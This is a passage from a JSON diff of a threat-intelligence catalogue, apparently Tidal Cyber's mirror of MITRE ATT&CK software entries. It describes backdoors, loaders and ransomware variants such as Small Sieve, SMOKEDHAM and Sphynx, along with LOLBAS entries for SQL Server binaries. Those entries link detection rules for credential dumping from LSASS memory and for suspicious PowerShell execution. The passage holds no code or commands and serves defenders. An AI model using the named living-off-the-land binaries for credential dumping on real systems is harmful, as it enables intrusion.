Sieve](https://app.tidalcyber.com/software/c58028b9-2e79-4bc9-9b04-d24ea4dd4948) is a Telegram Bot API-based Python backdoor that has been distributed using a Nullsoft Scriptable Install System (NSIS) Installer; it has been used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) since at least January 2022.[[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)][[NCSC GCHQ Small Sieve Jan 2022](https://app.tidalcyber.com/references/0edb8946-be38-45f5-a27c-bdbebc383d72)]\n\nSecurity researchers have also noted [Small Sieve](https://app.tidalcyber.com/software/c58028b9-2e79-4bc9-9b04-d24ea4dd4948)'s use by UNC3313, which may be associated with [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6).[[Mandiant UNC3313 Feb 2022](https://app.tidalcyber.com/references/ac1a1262-1254-4ab2-a940-2d08b6558e9e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1035", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "used-by" + }, + { + "dest-uuid": "ff41b9b6-4c1d-407b-a7e2-835109c8dbc5", + "type": "similar" + }, + { + "dest-uuid": "b4f0c7bd-888f-4b77-a269-0f85b9bd7bb0", + "type": "similar" + } + ], + "uuid": "c58028b9-2e79-4bc9-9b04-d24ea4dd4948", + "value": "Small Sieve" + }, + { + "description": "[SMOKEDHAM](https://app.tidalcyber.com/software/9ae4154d-ee48-4aeb-b76f-6e40dbe18ff3) is a Powershell-based .NET backdoor that was first reported in May 2021; it has been used by at least one ransomware-as-a-service affiliate.[[FireEye Shining A Light on DARKSIDE May 2021](https://app.tidalcyber.com/references/6ac6acc2-9fea-4887-99b2-9988991b47b6)][[FireEye SMOKEDHAM June 2021](https://app.tidalcyber.com/references/a81ad3ef-fd96-432c-a7c8-ccc86d127a1b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0649", + "source": "MITRE", + "tags": [ + "16b47583-1c54-431f-9f09-759df7b5ddb7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "7e0f8b0f-716e-494d-827e-310bd6ed709e", + "type": "similar" + } + ], + "uuid": "9ae4154d-ee48-4aeb-b76f-6e40dbe18ff3", + "value": "SMOKEDHAM" + }, + { + "description": "[[Malwarebytes SmokeLoader 2016](https://app.tidalcyber.com/references/b619e338-16aa-478c-b227-b22f78d572a3)] [[Microsoft Dofoil 2018](https://app.tidalcyber.com/references/85069317-2c25-448b-9ff4-504e429dc1bf)]", + "meta": { + "id": "65b0d392-fe6d-4c7d-89a7-163164be6599" + }, + "related": [ + { + "dest-uuid": "2244253f-a4ad-4ea9-a4bf-fa2f4d895853", + "type": "similar" + } + ], + "uuid": "e85ca2c7-0bfc-4a70-b696-a7ccf0867ac0", + "value": "Dofoil" + }, + { + "description": "[Smoke Loader](https://app.tidalcyber.com/software/2244253f-a4ad-4ea9-a4bf-fa2f4d895853) is a malicious bot application that can be used to load other malware.\n[Smoke Loader](https://app.tidalcyber.com/software/2244253f-a4ad-4ea9-a4bf-fa2f4d895853) has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins. [[Malwarebytes SmokeLoader 2016](https://app.tidalcyber.com/references/b619e338-16aa-478c-b227-b22f78d572a3)] [[Microsoft Dofoil 2018](https://app.tidalcyber.com/references/85069317-2c25-448b-9ff4-504e429dc1bf)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0226", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0c824410-58ff-49b2-9cf2-1c96b182bdf0", + "type": "similar" + }, + { + "dest-uuid": "e85ca2c7-0bfc-4a70-b696-a7ccf0867ac0", + "type": "similar" + } + ], + "uuid": "2244253f-a4ad-4ea9-a4bf-fa2f4d895853", + "value": "Smoke Loader" + }, + { + "description": "[Snip3](https://app.tidalcyber.com/software/f587dc27-92be-5894-a4a8-d6c8bbcf8ede) is a sophisticated crypter-as-a-service that has been used since at least 2021 to obfuscate and load numerous strains of malware including [AsyncRAT](https://app.tidalcyber.com/software/d587efff-4699-51c7-a4cc-bdbd1b302ed4), [Revenge RAT](https://app.tidalcyber.com/software/f99712b4-37a2-437c-92d7-fb4f94a1f892), [Agent Tesla](https://app.tidalcyber.com/software/304650b1-a0b5-460c-9210-23a5b53815a4), and [NETWIRE](https://app.tidalcyber.com/software/c7d0e881-80a1-49ea-9c1f-b6e53cf399a8).[[Morphisec Snip3 May 2021](https://app.tidalcyber.com/references/abe44c50-8347-5c98-8b04-d41afbe59d4c)][[Telefonica Snip3 December 2021](https://app.tidalcyber.com/references/f026dd44-1491-505b-8a8a-e4f28c6cd6a7)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1086", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "1bfbb1e1-022c-57e9-b70e-711c601640be", + "type": "used-by" + }, + { + "dest-uuid": "4327aff5-f194-440c-b499-4d9730cc1eab", + "type": "similar" + } + ], + "uuid": "f587dc27-92be-5894-a4a8-d6c8bbcf8ede", + "value": "Snip3" + }, + { + "description": "[SNUGRIDE](https://app.tidalcyber.com/software/d6c24f7c-fe79-4094-8f3c-68c4446ae4c7) is a backdoor that has been used by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) as first stage malware. [[FireEye APT10 April 2017](https://app.tidalcyber.com/references/2d494df8-83e3-45d2-b798-4c3bcf55f675)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0159", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "3240cbe4-c550-443b-aa76-cc2a7058b870", + "type": "similar" + } + ], + "uuid": "d6c24f7c-fe79-4094-8f3c-68c4446ae4c7", + "value": "SNUGRIDE" + }, + { + "description": "[Socksbot](https://app.tidalcyber.com/software/c1906bb6-0b5b-4916-8b29-37f7e272f6b3) is a backdoor that abuses Socket Secure (SOCKS) proxies. [[TrendMicro Patchwork Dec 2017](https://app.tidalcyber.com/references/15465b26-99e1-4956-8c81-cda3388169b8)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0273", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "e494ad79-37ee-4cd0-866b-299c521d8b94", + "type": "similar" + } + ], + "uuid": "c1906bb6-0b5b-4916-8b29-37f7e272f6b3", + "value": "Socksbot" + }, + { + "description": "[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", + "meta": { + "id": "3d4324f4-ea93-49d7-b95f-b5c690d78456" + }, + "related": [ + { + "dest-uuid": "6ecd970c-427b-4421-a831-69f46047d22a", + "type": "similar" + } + ], + "uuid": "c1e3a23a-0680-4742-80ba-ae402c94ce02", + "value": "DARKTOWN" + }, + { + "description": "[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", + "meta": { + "id": "cef3602e-3b6c-47eb-9288-11f015690e71" + }, + "related": [ + { + "dest-uuid": "6ecd970c-427b-4421-a831-69f46047d22a", + "type": "similar" + } + ], + "uuid": "59a29c95-59db-4106-aef4-704fcb723be6", + "value": "DelfsCake" + }, + { + "description": "[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", + "meta": { + "id": "bf3db8b9-4dc0-497b-8b02-729b1e900d85" + }, + "related": [ + { + "dest-uuid": "6ecd970c-427b-4421-a831-69f46047d22a", + "type": "similar" + } + ], + "uuid": "d5ae171f-4dcc-43b5-929f-eaa010c6721a", + "value": "dfls" + }, + { + "description": "[SodaMaster](https://app.tidalcyber.com/software/6ecd970c-427b-4421-a831-69f46047d22a) is a fileless malware used by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) to download and execute payloads since at least 2020.[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0627", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "94d6d788-07bb-4dcc-b62f-e02626b00108", + "type": "similar" + }, + { + "dest-uuid": "c1e3a23a-0680-4742-80ba-ae402c94ce02", + "type": "similar" + }, + { + "dest-uuid": "59a29c95-59db-4106-aef4-704fcb723be6", + "type": "similar" + }, + { + "dest-uuid": "d5ae171f-4dcc-43b5-929f-eaa010c6721a", + "type": "similar" + } + ], + "uuid": "6ecd970c-427b-4421-a831-69f46047d22a", + "value": "SodaMaster" + }, + { + "description": "SoftPerfect Network Scanner is a tool used to perform network scans for systems management purposes.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5008", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "15b77e5c-2285-434d-9719-73c14beba8bd", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + }, + { + "dest-uuid": "6d6ed42c-760c-4964-a81e-1d4df06a8800", + "type": "used-by" + }, + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + } + ], + "uuid": "4272447f-8803-4947-b66f-051eecdd3385", + "value": "SoftPerfect Network Scanner" + }, + { + "description": "[SombRAT](https://app.tidalcyber.com/software/0ec24158-d5d7-4d2e-b5a5-bc862328a317) is a modular backdoor written in C++ that has been used since at least 2019 to download and execute malicious payloads, including [FIVEHANDS](https://app.tidalcyber.com/software/84187393-2fe9-4136-8720-a6893734ee8c) ransomware.[[BlackBerry CostaRicto November 2020](https://app.tidalcyber.com/references/93a23447-641c-4ee2-9fbd-64b2adea8a5f)][[FireEye FiveHands April 2021](https://app.tidalcyber.com/references/832aeb46-b248-43e8-9157-a2f56bcd1806)][[CISA AR21-126A FIVEHANDS May 2021](https://app.tidalcyber.com/references/f98604dd-2881-4024-8e43-6f5f48c6c9fa)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0615", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "425771c5-48b4-4ecd-9f95-74ed3fc9da59", + "type": "similar" + } + ], + "uuid": "0ec24158-d5d7-4d2e-b5a5-bc862328a317", + "value": "SombRAT" + }, + { + "description": "[SoreFang](https://app.tidalcyber.com/software/3e959586-14ff-407b-a0d0-4e9580546f3f) is first stage downloader used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) for exfiltration and to load other malware.[[NCSC APT29 July 2020](https://app.tidalcyber.com/references/28da86a6-4ca1-4bb4-a401-d4aa469c0034)][[CISA SoreFang July 2016](https://app.tidalcyber.com/references/a87db09c-cadc-48fd-9634-8dd44bbd9009)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0516", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "e33e4603-afab-402d-b2a1-248d435b5fe0", + "type": "similar" + } + ], + "uuid": "3e959586-14ff-407b-a0d0-4e9580546f3f", + "value": "SoreFang" + }, + { + "description": "[SOUNDBITE](https://app.tidalcyber.com/software/069538a5-3cb8-4eb4-9fbb-83867bb4d826) is a signature backdoor used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145). [[FireEye APT32 May 2017](https://app.tidalcyber.com/references/b72d017b-a70f-4003-b3d9-90d79aca812d)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0157", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "used-by" + }, + { + "dest-uuid": "9ca488bd-9587-48ef-b923-1743523e63b2", + "type": "similar" + } + ], + "uuid": "069538a5-3cb8-4eb4-9fbb-83867bb4d826", + "value": "SOUNDBITE" + }, + { + "description": "[SPACESHIP](https://app.tidalcyber.com/software/0f8d0a73-9cd3-475a-b31b-d457278c921a) is malware developed by [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) that allows propagation and exfiltration of data over removable devices. [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) may use this capability to exfiltrate data across air-gaps. [[FireEye APT30](https://app.tidalcyber.com/references/c48d2084-61cf-4e86-8072-01e5d2de8416)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0035", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "be45ff95-6c74-4000-bc39-63044673d82f", + "type": "used-by" + }, + { + "dest-uuid": "8b880b41-5139-4807-baa9-309690218719", + "type": "similar" + } + ], + "uuid": "0f8d0a73-9cd3-475a-b31b-d457278c921a", + "value": "SPACESHIP" + }, + { + "description": "\n[Spark](https://app.tidalcyber.com/software/93f8c180-6794-4e9c-b716-6b31f42eb72d) is a Windows backdoor and has been in use since as early as 2017.[[Unit42 Molerat Mar 2020](https://app.tidalcyber.com/references/328f1c87-c9dc-42d8-bb33-a17ad4d7f57e)] ", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0543", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "679b7b6b-9659-4e56-9ffd-688a6fab01b6", + "type": "used-by" + }, + { + "dest-uuid": "03ea629c-517a-41e3-94f8-c7e5368cf8f4", + "type": "similar" + } + ], + "uuid": "93f8c180-6794-4e9c-b716-6b31f42eb72d", + "value": "Spark" + }, + { + "description": "[SpeakUp](https://app.tidalcyber.com/software/b9b67878-4eb1-4a0b-9b36-a798881ed566) is a Trojan backdoor that targets both Linux and OSX devices. It was first observed in January 2019. [[CheckPoint SpeakUp Feb 2019](https://app.tidalcyber.com/references/8f0d6a8d-6bd4-4df5-aa28-70e1ec4b0b12)]", + "meta": { + "platforms": [ + "Linux", + "macOS" + ], + "software_attack_id": "S0374", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a5575606-9b85-4e3d-9cd2-40ef30e3672d", + "type": "similar" + } + ], + "uuid": "b9b67878-4eb1-4a0b-9b36-a798881ed566", + "value": "SpeakUp" + }, + { + "description": "Sphynx is a variant of BlackCat ransomware (AKA ALPHV or Noberus) first observed in early 2023, which features multiple defense evasion-focused enhancements over the BlackCat strain. For example, Sphynx uses a more complex set of execution parameters, its configuration details are formatted as raw structures instead of JSON, and observed samples contain large amounts of “junk” code and encrypted strings.[[X-Force BlackCat May 30 2023](/references/b80c1f70-9d05-4f4b-bdc2-6157c6837202)] Sphynx also features built-in versions of other tools to support specific functions, including the open-source Impacket tool for lateral movement and Remcom, a hacking tool that facilitates remote code execution.[[Microsoft Threat Intelligence Tweet August 17 2023](/references/8b0ebcb5-d531-4f49-aa2d-bceb5e491b3f)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5055", + "source": "Tidal Cyber", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "33159d02-a1ce-49ec-a381-60b069db66f7", + "type": "used-by" + } + ], + "uuid": "cdbebd0a-3036-4a24-b1d5-a3f0ca9c758e", + "value": "Sphynx" + }, + { + "description": "[SpicyOmelette](https://app.tidalcyber.com/software/2be9e22d-0af8-46f5-b30e-b3712ccf716d) is a JavaScript based remote access tool that has been used by [Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) since at least 2018.[[Secureworks GOLD KINGSWOOD September 2018](https://app.tidalcyber.com/references/cda529b2-e152-4ff0-a6b3-d0305b09fef9)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0646", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "58db02e6-d908-47c2-bc82-ed58ada61331", + "type": "used-by" + }, + { + "dest-uuid": "599cd7b5-37b5-4cdd-8174-2811531ce9d0", + "type": "similar" + } + ], + "uuid": "2be9e22d-0af8-46f5-b30e-b3712ccf716d", + "value": "SpicyOmelette" + }, + { + "description": "", + "meta": { + "id": "13a6912b-5f12-4e1b-805d-828fdbc049e6", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "ecf8b878-19e5-425b-bc34-d5ed6e999fea", + "type": "similar" + } + ], + "uuid": "04aa2e49-be3f-4fbe-970f-a79c8a1f0463", + "value": "Splashtop Streamer" + }, + { + "description": "Splashtop is a tool used to enable remote connections to network devices for support and administration.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5009", + "source": "Tidal Cyber", + "tags": [ + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", + "9bc47297-864d-4f39-be37-ad9379102853", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "15b77e5c-2285-434d-9719-73c14beba8bd", + "e727eaa6-ef41-4965-b93a-8ad0c51d0236" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + }, + { + "dest-uuid": "33159d02-a1ce-49ec-a381-60b069db66f7", + "type": "used-by" + }, + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "04aa2e49-be3f-4fbe-970f-a79c8a1f0463", + "type": "similar" + } + ], + "uuid": "ecf8b878-19e5-425b-bc34-d5ed6e999fea", + "value": "Splashtop" + }, + { + "description": "[spwebmember](https://app.tidalcyber.com/software/0fdabff3-d996-493c-af67-f3ac02e4b00b) is a Microsoft SharePoint enumeration and data dumping tool written in .NET. [[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0227", + "source": "MITRE", + "tags": [ + "cd1b5d44-226e-4405-8985-800492cf2865", + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "26c0925f-1a3c-4df6-b27a-62b9731299b8", + "type": "used-by" + }, + { + "dest-uuid": "33b9e38f-103c-412d-bdcf-904a91fff1e4", + "type": "similar" + } + ], + "uuid": "0fdabff3-d996-493c-af67-f3ac02e4b00b", + "value": "spwebmember" + }, + { + "description": "[[Sqldumper.exe - LOLBAS Project](/references/793d6262-37af-46e1-a6b5-a5262f4a749d)]", + "meta": { + "id": "11508d6e-6991-444d-81cd-a7e8f2fbd4ee", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "146bd853-166b-4859-b4d7-b70f51bfd8e9", + "type": "similar" + } + ], + "uuid": "1931b352-fd83-4da0-ad18-747ffdd69f67", + "value": "Sqldumper.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Debugging utility included with Microsoft SQL.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Program Files\\Microsoft SQL Server\\90\\Shared\\SQLDumper.exe\n* C:\\Program Files (x86)\\Microsoft Office\\root\\vfs\\ProgramFilesX86\\Microsoft Analysis\\AS OLEDB\\140\\SQLDumper.exe\n\n**Resources:**\n* [https://twitter.com/countuponsec/status/910969424215232518](https://twitter.com/countuponsec/status/910969424215232518)\n* [https://twitter.com/countuponsec/status/910977826853068800](https://twitter.com/countuponsec/status/910977826853068800)\n* [https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se](https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_susp_sqldumper_activity.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml)\n* Elastic: [credential_access_lsass_memdump_file_created.toml](https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_lsass_memdump_file_created.toml)\n* Elastic: [credential_access_cmdline_dump_tool.toml](https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml)[[Sqldumper.exe - LOLBAS Project](/references/793d6262-37af-46e1-a6b5-a5262f4a749d)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5235", + "source": "Tidal Cyber", + "tags": [ + "e992169d-832d-44e9-8218-0f4ab0ff72b4", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "1931b352-fd83-4da0-ad18-747ffdd69f67", + "type": "similar" + } + ], + "uuid": "146bd853-166b-4859-b4d7-b70f51bfd8e9", + "value": "Sqldumper" + }, + { + "description": "[sqlmap](https://app.tidalcyber.com/software/96c224a6-6ca4-4ac1-9990-d863ec5a317a) is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. [[sqlmap Introduction](https://app.tidalcyber.com/references/ac643245-d54f-470f-a393-26875c0877c8)]", + "meta": { + "platforms": [], + "software_attack_id": "S0225", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "e38bcb42-12c1-4202-a794-ec26cd830caa", + "type": "used-by" + }, + { + "dest-uuid": "9a2640c2-9f43-46fe-b13f-bde881e55555", + "type": "similar" + } + ], + "uuid": "96c224a6-6ca4-4ac1-9990-d863ec5a317a", + "value": "sqlmap" + }, + { + "description": "[[Sqlps.exe - LOLBAS Project](/references/31cc851a-c536-4cef-9391-d3c7d3eab64f)]", + "meta": { + "id": "6826a73c-1aed-4dc5-b6db-8ba5c30c5ff7", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "5b3c03d3-9ea1-4322-a422-ab2401ffc294", + "type": "similar" + } + ], + "uuid": "152e2ba8-bf02-42f4-abad-3205d6e8e4aa", + "value": "Sqlps.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\\100 and 110 are Powershell v2. Microsoft SQL Server\\120 and 130 are Powershell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but will be included with installation for compatability reasons.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Program files (x86)\\Microsoft SQL Server\\100\\Tools\\Binn\\sqlps.exe\n* C:\\Program files (x86)\\Microsoft SQL Server\\110\\Tools\\Binn\\sqlps.exe\n* C:\\Program files (x86)\\Microsoft SQL Server\\120\\Tools\\Binn\\sqlps.exe\n* C:\\Program files (x86)\\Microsoft SQL Server\\130\\Tools\\Binn\\sqlps.exe\n* C:\\Program Files (x86)\\Microsoft SQL Server\\150\\Tools\\Binn\\SQLPS.exe\n\n**Resources:**\n* [https://twitter.com/ManuelBerrueta/status/1527289261350760455](https://twitter.com/ManuelBerrueta/status/1527289261350760455)\n* [https://twitter.com/bryon_/status/975835709587075072](https://twitter.com/bryon_/status/975835709587075072)\n* [https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017](https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017)\n\n**Detection:**\n* Sigma: [proc_creation_win_mssql_sqlps_susp_execution.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml)\n* Sigma: [image_load_dll_system_management_automation_susp_load.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml)\n* Elastic: [execution_suspicious_powershell_imgload.toml](https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/execution_suspicious_powershell_imgload.toml)\n* Splunk: [2021-10-05-suspicious_copy_on_system32.md](https://github.com/splunk/security_content/blob/aa9f7e0d13a61626c69367290ed1b7b71d1281fd/docs/_posts/2021-10-05-suspicious_copy_on_system32.md)[[Sqlps.exe - LOLBAS Project](/references/31cc851a-c536-4cef-9391-d3c7d3eab64f)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5236", + "source": "Tidal Cyber", + "tags": [ + "da7e88fd-2d71-4928-81ce-e3d455b3d418", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "152e2ba8-bf02-42f4-abad-3205d6e8e4aa", + "type": "similar" + } + ], + "uuid": "5b3c03d3-9ea1-4322-a422-ab2401ffc294", + "value": "Sqlps" + }, + { + "description": "[SQLRat](https://app.tidalcyber.com/software/612f780a-239a-4bd0-a29f-63beadf3ed22) is malware that executes SQL scripts to avoid leaving traditional host artifacts. [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) has been observed using it.[[Flashpoint FIN 7 March 2019](https://app.tidalcyber.com/references/b09453a3-c0df-4e96-b399-e7b34e068e9d)]", + "meta": { + "platforms": [], + "software_attack_id": "S0390", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "used-by" + }, + { + "dest-uuid": "8fc6c9e7-a162-4ca4-a488-f1819e9a7b06", + "type": "similar" + } + ], + "uuid": "612f780a-239a-4bd0-a29f-63beadf3ed22", + "value": "SQLRat" + }, + { + "description": "[[SQLToolsPS.exe - LOLBAS Project](/references/612c9569-80af-48d2-a853-0f6e3f55aa50)]", + "meta": { + "id": "ca40ccd1-095f-4fc3-8ba6-fd9a402d82ba", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "9271e5cf-f788-4d7d-9c7a-8d5e37cbb9a6", + "type": "similar" + } + ], + "uuid": "3c46936b-f9c4-4a3a-bea7-ca48f4a0660b", + "value": "SQLToolsPS.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Tool included with Microsoft SQL that loads SQL Server cmdlts. A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+.\n\n**Author:** Oddvar 